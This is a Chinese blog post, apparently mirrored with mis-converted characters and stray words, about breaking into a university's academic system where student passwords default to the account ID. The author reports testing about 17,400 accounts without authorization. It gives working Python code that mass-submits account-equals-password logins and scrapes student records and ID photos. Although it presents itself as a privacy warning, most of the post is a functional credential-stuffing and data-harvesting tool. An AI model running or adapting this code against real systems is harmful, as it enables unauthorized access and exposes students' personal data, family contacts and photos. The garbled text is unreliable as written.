本文旨在提醒同窗們及時修改密碼,加強保護我的隱私的意識,所以代碼中一些關鍵數據以及校名等信息不會公開!複製粘貼文章中的代碼不會爬到任何東西。只是做爲學習 Python 爬蟲的一點總結而已!html
做者所在學校的教務系統安全防範措施可謂很是不嚴密,學生登陸甚至不須要圖形驗證碼。每一年學生入學以後,學校下發的帳號,初始密碼不是無規律的,而是和帳號徹底一致!若是學生不及時修改密碼,那麼其餘人能夠輕鬆登陸他的帳號。登陸後能夠看到學生的學籍信息,包括高考報名時照片,家長聯繫方式等,聯繫地址甚至詳細到幾單元幾樓幾號門,我的信息泄露狀況很是嚴重!python
先說結果。通過兩天連寫帶調試,終於完成了對全校本科生 17400 多個在網帳號的測試,其中有 12600 多個帳號使用的仍是初始密碼。此處隱去校名,統計結果以下:git
序號 | 學院 | 年級 | 在網帳號 | 可爬帳號 | 年級佔比 |
---|---|---|---|---|---|
1 | 本一 | 2014 | 3157 | 1998 | 63.29% |
2 | 本一 | 2015 | 3328 | 2234 | 67.13% |
3 | 本一 | 2016 | 3641 | 3066 | 84.21% |
4 | 本一 | 2017 | 3497 | 3326 | 95.11% |
5 | 本三 | 2014 | 1759 | 303 | 17.23% |
6 | 本三 | 2015 | 1643 | 620 | 37.74% |
7 | 本三 | 2016 | 1605 | 1434 | 89.35% |
8 | 本三 | 2017 | 1552 | 639 | 41.17% |
介於初衷,只爬了 10 個帳號的信息,以示嚴重性!github
本人以前作過近 2 年的 Java 相關開發,對 HTTP 協議中經常使用的知識瞭解一些,再加上 Python 出了名的簡潔易用,所以入門仍是比較輕鬆的。去年有一段時間研究過一陣子 Python,使用的是 Scrapy 框架,因此這一次我也首先想到了 Scrapy。瀏覽器
Scrapy 這種框架適用的情形是:已經獲取了須要爬取的頁面的一系列 URL ,或者 URL 是成必定規律變化的,不須要登陸或者登陸一次拿到 Cookie 就能夠拿着這個 Cookie 一直用了。可是教務系統徹底相反,它須要每次都進行登陸,也許 Scrapy 有辦法,但也不會太簡單,索性本身寫。安全
這套教務系統雖然安全性不怎麼樣,但也已經是一套成熟的產品了,功能和穩定性上仍是很不錯的。服務器
首先使用 Firefox 瀏覽器的開發者工具查看 HTTP 通訊的一些信息:cookie
登陸表單經過 POST 請求進行提交,參數是帳號和密碼,發送的也是明文app
服務器返回的響應中 Set-Cookie 就至關於給用戶下發的令牌,用戶下一次請求的時候帶上這塊令牌,服務器就能認出來這個用戶是否剛登陸過。這個令牌是有時間限制的,每次請求都會刷新一次時間,若是兩次請求之間間隔時間超過設定值,那麼服務器就不認識用戶了,此次會話就結束了,須要從新登陸。框架
剛開始使用的是 requests ,用 for 循環實現,因爲 requests 是同步的,因此效率很低,還會常常卡死。後來改爲了協程,用的 gevent + urllib3,效率提高了上百倍。解析 HTML 用的 lxml 的 etree,圖片的保存用 PIL 的 Image。
先引入依賴
import sys
import logging
import gevent
import urllib3
import pathlib
from PIL import Image
from io import BytesIO
from lxml import etree
複製代碼
建立 HTTP 鏈接池
http = urllib3.HTTPConnectionPool(
host=settings.SERVER_HOST,
port=settings.SERVER_PORT,
strict=False,
maxsize=100,
block=False,
retries=100,
timeout=10
)
複製代碼
請求頭的一些固定信息能夠預先設定好,假裝瀏覽器
header = {'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
'Cache-Control': 'max-age=0',
'Connection': 'Keep-alive',
'Host': settings.SERVER_HOST,
'Upgrade-Insecure-Requests': '1',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0'
}
複製代碼
登陸並驗證是不是初始密碼
# 帳號校驗器
class InfoValidate(object):
def __init__(self):
self.logger = InfoMain.logger
self.http = InfoMain.http
# 有效帳號
self.account_valid = []
# 可爬帳號
self.account_available = []
def validate(self, all_account):
# 將全部校驗過程加入隊列
jobs = [gevent.spawn(self.validate_account, self.http, a) for a in all_account]
gevent.joinall(jobs, timeout=0)
def validate_account(self, http, account):
# 登陸請求參數
param = {"zjh": account, "mm": account}
header = headers.header
response = http.request('POST', settings.URL_LOGIN, fields=param, headers=header)
self.logger.info('發送請求>>{}'.format(param))
self.logger.info(response.status)
# 響應體解碼
res_text = response.data.decode('GB2312', 'ignore')
if res_text.find('密碼不正確') > -1:
# 密碼有誤
self.account_valid.append(account)
elif not res_text.find('證件號不存在') > -1:
# 帳號可爬
self.account_available.append(account)
self.account_valid.append(account)
self.logger.info("帳號可用>>>{}".format(account))
複製代碼
至此已經獲取了全部初始密碼未修改的帳號了,下面研究一下,要爬取的學籍信息頁的規律
一系列的信息都包裹在 <td width = "275"></td>
之間,對應的 xpath 表達式即爲 //td[starts-with(@width,"275")]/text()
基於以前對帳號的測試,爬取學籍信息
# 信息收集器
class InfoCollect(object):
def __init__(self):
self.logger = InfoMain.logger
self.http = InfoMain.http
# 功能模塊
self.mod_get_roll_info = settings.MOD_ROLL_INFO
self.mod_get_roll_img = settings.MOD_ROLL_IMG
def get_info_queue(self, accounts):
# 將全部信息收集過程加入隊列
jobs = [gevent.spawn(self.get_info, a) for a in accounts]
gevent.joinall(jobs, timeout=0)
def get_info(self, stuid):
# 登陸
param = {'zjh': stuid, 'mm': stuid}
response = self.http.request('POST', settings.URL_LOGIN, fields=param)
# 保存 Cookie
cookie = response.headers['Set-Cookie'].replace('; path=/', '')
header = headers.header
header['cookie'] = cookie
# 學籍信息
if self.mod_get_roll_info:
# 帶 Cookie 訪問學籍信息頁
response_xjxx = self.http.request('GET', settings.URL_XJXX, headers=header)
text = response_xjxx.data.decode('GB2312', 'ignore')
# 解析頁面內容
selector = etree.HTML(text)
text_arr = selector.xpath('//td[starts-with(@width,"275")]/text()')
# 學籍信息
result = []
for info in text_arr:
result.append(info.strip())
self.save_info(result)
# 學籍照片
if self.mod_get_roll_img:
response_xjzp = self.http.request('GET', settings.URL_XJZP, headers=header)
image = Image.open(BytesIO(response_xjzp.data))
setpath = settings.PATH_IMG_SAVE
path = pathlib.Path(setpath)
if not path.exists():
path.mkdir()
setpath = setpath + '/' + stuid + '.jpg'
image.save(setpath)
self.logger.info('保存照片>>>{}'.format(setpath))
# 登出
self.http.request('POST', settings.URL_LOGOUT, headers=header)
複製代碼
至此,已經實現了全部信息的獲取以及照片的保存。
沒改密碼的同窗們應該看到了,獲取我的信息其實很簡單,關鍵在於加強本身保護我的信息的意識。
相關開源項目:URP_Spider github.com/JamesZBL/UR…